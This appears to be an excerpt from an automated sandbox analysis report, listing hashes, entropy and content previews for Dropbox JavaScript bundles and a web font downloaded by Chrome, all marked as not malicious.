                                                    SHA-512:886C559ACBCB270A1A9FB4B5F014890C86CCB6C2F06FCCA7D9858E1FD8FFD52F63C05BD5C0E2BCFB789CCCBE21C651F86FE413C54074296F0609D01C251C292C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_chat_chat_client-vflmHpVqC.js
                                                    Preview:define(["require","exports","./c_ts_utils","./c_core_notify","./e_file_viewer_static_scl_page_folder","./c_api_v2_routes_folders_info_provider","./c_core_i18n","react-dom","react","./e_core_exception","./c_src_sink_index"],(function(t,e,a,i,s,n,r,o,h,c,d){"use strict";function p(t){return t&&t.__esModule?t:{default:t}}function m(t){if(t&&t.__esModule)return t;var e=Object.create(null);return t&&Object.keys(t).forEach((function(a){if("default"!==a){var i=Object.getOwnPropertyDescriptor(t,a);Object.defineProperty(e,a,i.get?i:{enumerable:!0,get:function(){return t[a]}})}})),e.default=t,Object.freeze(e)}var g=m(o),l=p(h);function _(t){return"1508d082-aa3d-468f-9ac3-cfeb7d5a8435"===t||"c0b3fc4d-5e75-4c65-b5c0-db72be2085f7"===t}var u,C,S,T;e.ChatProviderType=void 0,(u=e.ChatProviderType||(e.ChatProviderType={}))[u.SNAPENGAGE=0]="SNAPENGAGE",u[u.DIALOGUE_CHAT=1]="DIALOGUE_CHAT",u[u.SOLVVY=2]="SOLVVY",a.proto3.util.setEnumType(e.ChatProviderType,"chat.ChatProviderType",[{no:0,name:"SNAPENGAGE"
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (960)
                                                    Category:dropped
                                                    Size (bytes):1026
                                                    Entropy (8bit):5.293828094989458
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4916641BA765339594EFDDFFBFE28326
                                                    SHA1:BD95DF31D09A3673260188DE9BFD969FC4C9F5A8
                                                    SHA-256:6D2FC0E2C6690CA45F1AC9EA206FF33F1582E3222CB3644B3350C35D88B07DEB
                                                    SHA-512:8BC1F1036AA93196A2232453AFA5926CDBAF07EFBB14C46F47D03D334B1941A49CFE446548EDC1C89682527F81A6BC43318A414A200379CB6320BD8B447861C0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder"],(function(e,a){"use strict";const p=e=>a.AUDIO_EXTS.includes(e),i=e=>a.TRANSCODE_VIDEO_EXTS.includes(e),y=e=>a.IMAGE_EXIF_EXTS.includes(e),d=e=>".pdf"===e,l=e=>".psd"===e;var T;e.ReplayMediaType=void 0,(T=e.ReplayMediaType||(e.ReplayMediaType={})).VIDEO="video",T.AUDIO="audio",T.IMAGE="image",T.PDF="pdf",T.PSD="psd",T.NONE="none";e.MAX_DOCUMENT_UPLOAD_SIZE=41943040,e.getReplayMediaType=a=>p(a)?e.ReplayMediaType.AUDIO:i(a)?e.ReplayMediaType.VIDEO:y(a)?e.ReplayMediaType.IMAGE:d(a)?e.ReplayMediaType.PDF:l(a)?e.ReplayMediaType.PSD:e.ReplayMediaType.NONE,e.isReplayFileTypeWithPDFAndPSD=e=>(e=>p(e)||i(e)||y(e))(e)||d(e)||l(e),e.replayMediaTypeToLoggingType=a=>{switch(a){case e.ReplayMediaType.AUDIO:return"audio";case e.ReplayMediaType.VIDEO:return"video";case e.ReplayMediaType.IMAGE:return"image";case e.ReplayMediaType.PDF:return"pdf";case e.ReplayMediaType.PSD:return"psd";default:return}}}));.//# sourceMappingURL=c_replay_replay_ex
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 54666, version 1.0
                                                    Category:downloaded
                                                    Size (bytes):54666
                                                    Entropy (8bit):7.996310405191114
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:EBEE194A9B773F166DC16096F8614AAA
                                                    SHA1:9D6A893AF295C90E9E9792D7E54A80034192255B
                                                    SHA-256:00F90DB31F42975FCDC5FA1F70660568BE68792EC11BE2AAC36362F435A6E555
                                                    SHA-512:B1E67F381C8266FF60E09CCCBA6CB17FE0DF4CC8D373E15F20F14B6E8C2F6BAB4C0E91163E57C3C2F4593AC23512A43B2129CABA1945870BE4493D1DEF2DDCD5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/fonts/sharpgrotesk/SharpGroteskDBBook20-vfl6-4ZSp.woff2
                                                    Preview:wOF2.............KX...c.........................@...2..D.`..@................6.$..f..v.. ..R.....V[.....rW..y.@...=/.%}....W..=7.eA.Z[..m*1....h........'Y.......r.....>...i.~h.\.j...4..M.......Ch.0.@d"........J.......L.4..hdD..`F.=..S.... #.n....9.G...2.t...m..-.M..>,qv.rI.LN............1....{.o......xxD..G.jt.......Y....g'..G......g7.O...c.@6..uuS.C:....:.Z.!......0.u}...;J..%.q$.......... ...........KE...Gt..xw.....x....{...B.9.gvV...;...'s.%.nd:..k...1..z.T.........^..o..{...K@..^@.hc..._..&....g.%.@...E....f...]..[UIuR...:.....f.<g.....$..pj.(]...zF.......cc.o....-..1F.......u.^..yzi....U2.f%...w......:.R.{.lOP[L..r..B`2...s.u.?...)l.P#...!.#>.....Na..Tx./.]..K.....E)..0g..MO..?U.4.1...]..M\..6...............n..'....3rD9....{.{.....d..R5F.@a.6.6b7V"...$...h..J.Y.....'.=.....ga.X.............u.>..Y6P.6..bGB%:%x..e.IB.q............!F%b.......{.w] .6.w....9.~,......u#(.QS...$..n?.......{.$D_...Ht.Q.2.i%.._S`j+.~..~.e...$......L..q`.^.-+.'.
                                                    No static file info